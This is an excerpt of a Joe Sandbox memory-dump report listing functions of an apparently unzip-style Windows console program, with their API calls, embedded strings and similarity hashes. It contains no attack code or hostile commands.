                                          Memory Dump Source
                                          • Source File: 00000032.00000002.2766218833.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000032.00000002.2766202202.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766241134.000000000041E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766259569.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766534078.0000000000428000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_50_2_400000_azvw.jbxd
                                          Similarity
                                          • API ID: InfoLocale
                                          • String ID:
                                          • API String ID: 2299586839-0
                                          • Opcode ID: 3063c24a5b71c23c923af5feb8ca0f4c4c71082d0ad2a5863e7f5c886da2b426
                                          • Instruction ID: d2ed403ade62f16da6ef4183f008dc4ef17a0cac864e46f49f16e908037ef13a
                                          • Opcode Fuzzy Hash: 3063c24a5b71c23c923af5feb8ca0f4c4c71082d0ad2a5863e7f5c886da2b426
                                          • Instruction Fuzzy Hash: DDD012B524C34075FA280F226C47FE737985B48B01F24905AFB91AB2D2D7A898455A39
                                          Function 0040FF00 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 186fileCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0040F6B0: GetVersion.KERNEL32(004028AB,?,?,ZIPINFOOPT,?,?,?,00401014,?,?,0041492C,020405B8), ref: 0040F6BA
                                          • CreateFileA.KERNEL32(?,00000100,00000003,00000000,00000003,02000000,00000000,00000000,?,00000000,?,00403F26,?), ref: 0040FF28
                                          • GetLastError.KERNEL32(00000000,?,00000001), ref: 0041005E
                                          Strings
                                          • warning: SetFileTime() for %s error %d, xrefs: 004100EF
                                          • warning: CreateFile() error %d (set file times for %s), xrefs: 00410065
                                          • set attrib: %-22s , xrefs: 0040FF55
                                          • compressed WinNT security data missing (%d bytes)%s, xrefs: 0040FFEB
                                          • %-22s , xrefs: 0040FFB7
                                          Memory Dump Source
                                          • Source File: 00000032.00000002.2766218833.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000032.00000002.2766202202.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766241134.000000000041E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766259569.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766534078.0000000000428000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_50_2_400000_azvw.jbxd
                                          Similarity
                                          • API ID: CreateErrorFileLastVersion
                                          • String ID: compressed WinNT security data missing (%d bytes)%s$ set attrib: %-22s $%-22s $warning: SetFileTime() for %s error %d$warning: CreateFile() error %d (set file times for %s)
                                          • API String ID: 2621615039-3452739180
                                          • Opcode ID: 2b806aec2b57c61612aba36cfce3f43dab4ac99dab400fed94529667076e6c1e
                                          • Instruction ID: edb26e619037c44488cf69f2599f5cd4dd598bd07b404ecfb4a3fc13bc9991ba
                                          • Opcode Fuzzy Hash: 2b806aec2b57c61612aba36cfce3f43dab4ac99dab400fed94529667076e6c1e
                                          • Instruction Fuzzy Hash: 6051F9757803007BE720AB65BC47FB3365E9B54B15F94442BF909D22C2E6FEAC90826D
                                          Function 0041BAAB Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 50libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • LoadLibraryA.KERNEL32(user32.dll,?,00000000,?,0041A4B1,?,Microsoft Visual C++ Runtime Library,00012010,?,00423494,?,004234E4,?,?,?,Runtime Error!Program: ), ref: 0041BABD
                                          • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 0041BAD5
                                          • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 0041BAE6
                                          • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 0041BAF3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000032.00000002.2766218833.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000032.00000002.2766202202.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766241134.000000000041E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766259569.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766534078.0000000000428000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_50_2_400000_azvw.jbxd
                                          Similarity
                                          • API ID: AddressProc$LibraryLoad
                                          • String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll$4B
                                          • API String ID: 2238633743-2289559369
                                          • Opcode ID: 09a95b68fad4e2ac73f20e07bd1e8fe16aafe990b9da3c80e5661cf0b665ca6f
                                          • Instruction ID: 9c9cf768bb1ba27c629e3c903df4a55c7cd1ab91446db272b6502811c55c3a36
                                          • Opcode Fuzzy Hash: 09a95b68fad4e2ac73f20e07bd1e8fe16aafe990b9da3c80e5661cf0b665ca6f
                                          • Instruction Fuzzy Hash: 9C017531304316AB8720DFB5AC84EA77AB8EB48681754443BA946C2725D778DC46C79C
                                          Function 00407860 Relevance: 14.4, APIs: 3, Strings: 5, Instructions: 391COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000032.00000002.2766218833.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000032.00000002.2766202202.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766241134.000000000041E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766259569.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766534078.0000000000428000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_50_2_400000_azvw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: --- Press `Q' to quit, or any other key to continue ---$[ %s ]$nircmdc.exe$warning: extra field too long (%d). Ignoring...$warning: filename too long--truncating.
                                          • API String ID: 0-1331371059
                                          • Opcode ID: a089861949e6340726d744b7c5c5a373a40e7235673de09a17e0cbd3ad2df153
                                          • Instruction ID: 51b1e297df8a976b1ee28b2c1833878725061e8c3fbe01eded018527f9c4d9f5
                                          • Opcode Fuzzy Hash: a089861949e6340726d744b7c5c5a373a40e7235673de09a17e0cbd3ad2df153
                                          • Instruction Fuzzy Hash: 39C13B71B4C3416AEB209F2CAC45B667B55AB11318F28507BE881673C2D2BDBC46C39F
                                          Function 00412130 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 71fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateFileA.KERNEL32(CONIN$,C0000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,004075BA), ref: 00412150
                                          • GetConsoleMode.KERNEL32(00000000,?,?,?,004075BA), ref: 00412166
                                          • SetConsoleMode.KERNEL32(00000000,00000001,?,?,004075BA), ref: 00412173
                                          • ReadFile.KERNEL32(00000000,?,00000001,?,00000000,?,?,?,004075BA), ref: 0041218F
                                          • ReadFile.KERNEL32(00000000,?,00000001,00000001,00000000), ref: 004121BA
                                          • SetConsoleMode.KERNEL32(00000000,?,?,?,004075BA), ref: 004121DD
                                          • CloseHandle.KERNEL32(00000000,?,?,004075BA), ref: 004121E4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000032.00000002.2766218833.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000032.00000002.2766202202.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766241134.000000000041E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766259569.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766534078.0000000000428000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_50_2_400000_azvw.jbxd
                                          Similarity
                                          • API ID: ConsoleFileMode$Read$CloseCreateHandle
                                          • String ID: CONIN$
                                          • API String ID: 4003642833-3033795042
                                          • Opcode ID: 3e96ca424909fdc7b0da6d46b6abef9ef331b44d0c6254d227a55d37fe738f75
                                          • Instruction ID: e7930273b9cbbd300fa439537dbf3610411437395ea581ac5f8278a4b0bfe79b
                                          • Opcode Fuzzy Hash: 3e96ca424909fdc7b0da6d46b6abef9ef331b44d0c6254d227a55d37fe738f75
                                          • Instruction Fuzzy Hash: 4F11E436700311FBE621DB159C49FEB7768AB84720F108525FE10E61C0D7B499898B6E
                                          Function 00412310 Relevance: 13.7, APIs: 9, Instructions: 181stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • lstrlenA.KERNEL32(?), ref: 0041235C
                                            • Part of subcall function 00412550: CreateMutexA.KERNEL32(00000000,00000001,00000000,?,00000000,00000000,00412334), ref: 00412566
                                          • EnterCriticalSection.KERNEL32(00429220), ref: 0041240D
                                          • lstrcmpiA.KERNEL32(00429118,?), ref: 00412428
                                          • LeaveCriticalSection.KERNEL32(00429220), ref: 0041243F
                                          • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00412461
                                          • GetDriveTypeA.KERNEL32(?), ref: 00412493
                                          • EnterCriticalSection.KERNEL32(00429220), ref: 004124BD
                                          Memory Dump Source
                                          • Source File: 00000032.00000002.2766218833.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000032.00000002.2766202202.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766241134.000000000041E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766259569.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766534078.0000000000428000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_50_2_400000_azvw.jbxd
                                          Similarity
                                          • API ID: CriticalSection$Enter$CreateDriveInformationLeaveMutexTypeVolumelstrcmpilstrlen
                                          • String ID:
                                          • API String ID: 3268418500-0
                                          • Opcode ID: d8ef268f65cd5ebb51ce9872d8032ae48db8673499c663791f14b6ff2cf88466
                                          • Instruction ID: 2886dcb7fcb796122c9e5b216d3458b3906ab7dde395389191bfab681fb0c28f
                                          • Opcode Fuzzy Hash: d8ef268f65cd5ebb51ce9872d8032ae48db8673499c663791f14b6ff2cf88466
                                          • Instruction Fuzzy Hash: 8F51F7316083559FE320CF25E9457EBBBD4AB95300F54482EE890C3381D6BCDD9AC7AA
                                          Function 0041918F Relevance: 13.7, APIs: 9, Instructions: 177COMMON
                                          Download Yara Rule
                                          APIs
                                          • LCMapStringW.KERNEL32(00000000,00000100,004231C4,00000001,00000000,00000000,00000103,00000001,?,?,0041B122,00200020,00000000,?,?,00000000), ref: 004191D1
                                          • LCMapStringA.KERNEL32(00000000,00000100,004231C0,00000001,00000000,00000000,?,0041B122,00200020,00000000,?,?,00000000,00000001), ref: 004191ED
                                          • LCMapStringA.KERNEL32(?,?,00000000,00200020,0041B122,?,00000103,00000001,?,?,0041B122,00200020,00000000,?,?,00000000), ref: 00419236
                                          • MultiByteToWideChar.KERNEL32(?,00000002,00000000,00200020,00000000,00000000,00000103,00000001,?,?,0041B122,00200020,00000000,?,?,00000000), ref: 0041926E
                                          • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00200020,?,00000000,?,0041B122,00200020,00000000), ref: 004192C6
                                          • LCMapStringW.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,0041B122,00200020,00000000), ref: 004192DC
                                          • LCMapStringW.KERNEL32(?,?,0041B122,00000000,0041B122,?,?,0041B122,00200020,00000000), ref: 0041930F
                                          • LCMapStringW.KERNEL32(?,?,?,?,?,00000000,?,0041B122,00200020,00000000), ref: 00419377
                                          Memory Dump Source
                                          • Source File: 00000032.00000002.2766218833.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000032.00000002.2766202202.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766241134.000000000041E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766259569.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766534078.0000000000428000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_50_2_400000_azvw.jbxd
                                          Similarity
                                          • API ID: String$ByteCharMultiWide
                                          • String ID:
                                          • API String ID: 352835431-0
                                          • Opcode ID: 26d0b9452b8bc0e299162577c32f6f33c8d5b4764b2a63f7722eed71b1d7e419
                                          • Instruction ID: 55b7dface7ca53413e5a610a34780f482f7b03c06cfb318d5c2bd6adb41ae378
                                          • Opcode Fuzzy Hash: 26d0b9452b8bc0e299162577c32f6f33c8d5b4764b2a63f7722eed71b1d7e419
                                          • Instruction Fuzzy Hash: 0B515B31500209FBCF218F95CD49EEF7BB5FB49754F10412AF924A22A0D3398DA1DB69
                                          Function 00412200 Relevance: 13.6, APIs: 9, Instructions: 120COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0040F6B0: GetVersion.KERNEL32(004028AB,?,?,ZIPINFOOPT,?,?,?,00401014,?,?,0041492C,020405B8), ref: 0040F6BA
                                          • IsValidSecurityDescriptor.ADVAPI32(?), ref: 00412217
                                          • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00412237
                                          Memory Dump Source
                                          • Source File: 00000032.00000002.2766218833.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000032.00000002.2766202202.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766241134.000000000041E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766259569.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766534078.0000000000428000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_50_2_400000_azvw.jbxd
                                          Similarity
                                          • API ID: DescriptorSecurity$DaclValidVersion
                                          • String ID:
                                          • API String ID: 1532089921-0
                                          • Opcode ID: 0d93435f18004ed9e29ac5f9650c3a45ac4ace9d854fa5dae8183bc654cd503a
                                          • Instruction ID: 6816d2660224887e43d6666693bd05513e1fa9988970b9181180d49af46b03ac
                                          • Opcode Fuzzy Hash: 0d93435f18004ed9e29ac5f9650c3a45ac4ace9d854fa5dae8183bc654cd503a
                                          • Instruction Fuzzy Hash: B831A7367002225BA710DB2DED80DFF77E8EEC4754F84486AF854C2210F778D95946B6
                                          Function 0041A38D Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 100fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000), ref: 0041A3FA
                                          • GetStdHandle.KERNEL32(000000F4,00423494,00000000,?,00000000,00000000), ref: 0041A4D0
                                          • WriteFile.KERNEL32(00000000), ref: 0041A4D7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000032.00000002.2766218833.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000032.00000002.2766202202.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766241134.000000000041E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766259569.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766534078.0000000000428000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_50_2_400000_azvw.jbxd
                                          Similarity
                                          • API ID: File$HandleModuleNameWrite
                                          • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                          • API String ID: 3784150691-4022980321
                                          • Opcode ID: 04c2ac82d4cdaaabc69ab33a94a316821a7cf5c4c0c799cd293786380b4abd52
                                          • Instruction ID: 7a0306bc7714f66003fee43fc566662e0915a3c579c87e485ca05bdabf1bfbee
                                          • Opcode Fuzzy Hash: 04c2ac82d4cdaaabc69ab33a94a316821a7cf5c4c0c799cd293786380b4abd52
                                          • Instruction Fuzzy Hash: FB31C572702218AFDF20EA61DC4AFDE776C9B45344F9004AFF944D6140D6BCEAD48A5E
                                          Function 0041CE0F Relevance: 12.2, APIs: 8, Instructions: 181COMMON
                                          Download Yara Rule
                                          APIs
                                          • CompareStringW.KERNEL32(00000000,00000000,004231C4,00000001,004231C4,00000001,00000000,00000000,00000000,0041C6AA,00000000,00000000,74DEDF80,00000000,00000000), ref: 0041CE4D
                                          • CompareStringW.KERNEL32(00000000,74DEDF80,00000000,00000000,0041C6AA,00000000,00000000,00000000,00000000,0041C6AA,00000000,00000000,74DEDF80,00000000,00000000), ref: 0041CEB3
                                          • CompareStringA.KERNEL32(00000000,00000000,004231C0,00000001,004231C0,00000001,?,?,00000000,0041C134,00000000,00000000,?,?,?,0040144E), ref: 0041CEC9
                                          • WideCharToMultiByte.KERNEL32(00000000,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,0041C6AA,00000000,00000000,74DEDF80,00000000), ref: 0041CF0C
                                          • WideCharToMultiByte.KERNEL32(?,00000220,?,?,?,?,00000000,00000000), ref: 0041CF66
                                          • WideCharToMultiByte.KERNEL32(?,00000220,?,?,00000000,00000000,00000000,00000000), ref: 0041CF7E
                                          • WideCharToMultiByte.KERNEL32(?,00000220,?,?,?,?,00000000,00000000), ref: 0041CFD6
                                          • CompareStringA.KERNEL32(?,?,?,?,?,?,?,?,00000000,00000000), ref: 0041CFF4
                                          Memory Dump Source
                                          • Source File: 00000032.00000002.2766218833.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000032.00000002.2766202202.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766241134.000000000041E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766259569.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766534078.0000000000428000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_50_2_400000_azvw.jbxd
                                          Similarity
                                          • API ID: ByteCharCompareMultiStringWide
                                          • String ID:
                                          • API String ID: 1117519366-0
                                          • Opcode ID: a411932ad2318a4f170b5595e3798524a948137154e595a0eb41b66fa8cbb120
                                          • Instruction ID: a774bcca2041765d8996282b2f32d3625f26fdb7b7df1d6986941dd8b1866f47
                                          • Opcode Fuzzy Hash: a411932ad2318a4f170b5595e3798524a948137154e595a0eb41b66fa8cbb120
                                          • Instruction Fuzzy Hash: 26516A71A40209EBCF218F95CC85DEF7F79FB49754F20411AF811A1260D73989A1DBA8
                                          Function 0041D165 Relevance: 12.2, APIs: 8, Instructions: 170COMMON
                                          Download Yara Rule
                                          APIs
                                          • LCMapStringW.KERNEL32(00000000,00000100,004231C4,00000001,00000000,00000000,74DEDF80,00000002,00000000,00000000,0041C6AA,00000000,00000000,74DEDF80,00000000,00000000), ref: 0041D1A7
                                          • LCMapStringA.KERNEL32(00000000,00000100,004231C0,00000001,00000000,00000000,?,?,00000000,0041C134,00000000,00000000,?,?,?,0040144E), ref: 0041D1C3
                                          • LCMapStringW.KERNEL32(00000000,74DEDF80,00000000,00000000,0041C6AA,00000000,74DEDF80,00000002,00000000,00000000,0041C6AA,00000000,00000000,74DEDF80,00000000,00000000), ref: 0041D20C
                                          • WideCharToMultiByte.KERNEL32(00000000,00000220,00000000,00000000,00000000,00000000,00000000,00000000,74DEDF80,00000002,00000000,00000000,0041C6AA,00000000,00000000,74DEDF80), ref: 0041D23F
                                          • WideCharToMultiByte.KERNEL32(?,00000220,?,?,?,?,00000000,00000000), ref: 0041D296
                                          • LCMapStringA.KERNEL32(?,?,?,?,00000000,00000000), ref: 0041D2B2
                                          • LCMapStringA.KERNEL32(?,?,?,?,?,00000000), ref: 0041D308
                                          Memory Dump Source
                                          • Source File: 00000032.00000002.2766218833.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000032.00000002.2766202202.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766241134.000000000041E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766259569.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766534078.0000000000428000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_50_2_400000_azvw.jbxd
                                          Similarity
                                          • API ID: String$ByteCharMultiWide
                                          • String ID:
                                          • API String ID: 352835431-0
                                          • Opcode ID: 6909be8c5c249c1ea830a7f530855667d4e0118645d5f77b012ba46e2979939f
                                          • Instruction ID: f32d3add464206e8e0aed92ca822318019ba77b5f644faad787136d3d6fb05ee
                                          • Opcode Fuzzy Hash: 6909be8c5c249c1ea830a7f530855667d4e0118645d5f77b012ba46e2979939f
                                          • Instruction Fuzzy Hash: 62518FB1901219FBCF228F91DC45AEF7F75FF09750F148016F925A1260C7398992DBAA
                                          Function 0041A052 Relevance: 12.1, APIs: 8, Instructions: 132COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,004148FC), ref: 0041A06D
                                          • GetEnvironmentStrings.KERNEL32(?,?,?,?,?,?,004148FC), ref: 0041A081
                                          • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,004148FC), ref: 0041A0AD
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,?,?,?,?,?,004148FC), ref: 0041A0E5
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,?,?,?,004148FC), ref: 0041A107
                                          • FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,?,004148FC), ref: 0041A120
                                          • GetEnvironmentStrings.KERNEL32(?,?,?,?,?,?,004148FC), ref: 0041A133
                                          • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 0041A171
                                          Memory Dump Source
                                          • Source File: 00000032.00000002.2766218833.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000032.00000002.2766202202.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766241134.000000000041E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766259569.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766534078.0000000000428000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_50_2_400000_azvw.jbxd
                                          Similarity
                                          • API ID: EnvironmentStrings$ByteCharFreeMultiWide
                                          • String ID:
                                          • API String ID: 1823725401-0
                                          • Opcode ID: c8d47bca2f00aef09e3c29924055f81ad138db5fe313db441fa83e7eab80b45a
                                          • Instruction ID: 55f3ef25e741e715063bb0b53fb3b0197acadb47fa1d7b83ba552b9266e1e871
                                          • Opcode Fuzzy Hash: c8d47bca2f00aef09e3c29924055f81ad138db5fe313db441fa83e7eab80b45a
                                          • Instruction Fuzzy Hash: 0331E67250A2157FD7207FB59C848BBBA9CEA49354F15053BF952C3201E7698CD1826F
                                          Function 004181D9 Relevance: 12.1, APIs: 5, Strings: 3, Instructions: 102memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • HeapAlloc.KERNEL32(00000000,00002020,?,?,?,?,0041767B), ref: 004181FA
                                          • VirtualAlloc.KERNEL32(00000000,00400000,00002000,00000004,?,?,?,?,0041767B), ref: 0041821E
                                          • VirtualAlloc.KERNEL32(00000000,00010000,00001000,00000004,?,?,?,?,0041767B), ref: 00418238
                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,0041767B), ref: 004182F9
                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,0041767B), ref: 00418310
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000032.00000002.2766218833.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000032.00000002.2766202202.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766241134.000000000041E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766259569.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766534078.0000000000428000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_50_2_400000_azvw.jbxd
                                          Similarity
                                          • API ID: AllocVirtual$FreeHeap
                                          • String ID: hB$hB$hB
                                          • API String ID: 714016831-3407773006
                                          • Opcode ID: 21d0b8c3c549ef3f006421a9cbb870f42be1103d9f1cbd472c759b23aba7fc12
                                          • Instruction ID: 3deade5512a951a36e16256948898a48dfe75dffd287a545e5a0f75b2dea7774
                                          • Opcode Fuzzy Hash: 21d0b8c3c549ef3f006421a9cbb870f42be1103d9f1cbd472c759b23aba7fc12
                                          • Instruction Fuzzy Hash: 6A311271A40B01DBD3329F29DC40BA6B6E4EB44B54F11813FF56597290EB78A881DB4C
                                          Function 00412550 Relevance: 12.1, APIs: 8, Instructions: 54synchronizationCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateMutexA.KERNEL32(00000000,00000001,00000000,?,00000000,00000000,00412334), ref: 00412566
                                          • InterlockedExchange.KERNEL32(00428D6C,00000000), ref: 00412582
                                          • InterlockedExchange.KERNEL32(00428D6C,00000000), ref: 00412590
                                          • CloseHandle.KERNEL32(00000000), ref: 00412593
                                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0041259C
                                          • ReleaseMutex.KERNEL32(00000000), ref: 004125A3
                                          Memory Dump Source
                                          • Source File: 00000032.00000002.2766218833.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000032.00000002.2766202202.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766241134.000000000041E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766259569.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766534078.0000000000428000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_50_2_400000_azvw.jbxd
                                          Similarity
                                          • API ID: ExchangeInterlockedMutex$CloseCreateHandleObjectReleaseSingleWait
                                          • String ID:
                                          • API String ID: 1537229248-0
                                          • Opcode ID: 2233b778cae926ed051bf37e10cc9fba4f9749033d4a10a0707beef56968d8a8
                                          • Instruction ID: b0480333715e69541531a0b31537b6c343dc41711bcec5a2d42a26cd8254ad3b
                                          • Opcode Fuzzy Hash: 2233b778cae926ed051bf37e10cc9fba4f9749033d4a10a0707beef56968d8a8
                                          • Instruction Fuzzy Hash: 27017976751135BBE620176ABC84FCA7A54DB98761F504036FB04C1290CAE54855867D
                                          Function 0041A6FD Relevance: 9.1, APIs: 6, Instructions: 143COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetStringTypeW.KERNEL32(00000001,004231C4,00000001,00000000,74DEDF80,00000002,00000000,00000000,0041C6AA,00000000,00000000,74DEDF80), ref: 0041A73C
                                          • GetStringTypeA.KERNEL32(00000000,00000001,004231C0,00000001,?), ref: 0041A756
                                          • GetStringTypeW.KERNEL32(00000100,74DEDF80,00000000,00000000,74DEDF80,00000002,00000000,00000000,0041C6AA,00000000,00000000,74DEDF80), ref: 0041A77D
                                          • WideCharToMultiByte.KERNEL32(0041C6AA,00000220,74DEDF80,00000000,00000000,00000000,00000000,00000000,74DEDF80,00000002,00000000,00000000,0041C6AA,00000000,00000000,74DEDF80), ref: 0041A7B0
                                          • WideCharToMultiByte.KERNEL32(?,00000220,?,?,00000000,00000000,00000000,00000000), ref: 0041A819
                                          • GetStringTypeA.KERNEL32(?,00000100,?,?), ref: 0041A884
                                          Memory Dump Source
                                          • Source File: 00000032.00000002.2766218833.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000032.00000002.2766202202.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000032.00000002.2766241134.000000000041E000.00000002.00000001.01000000.00000007.sdmpDownload File
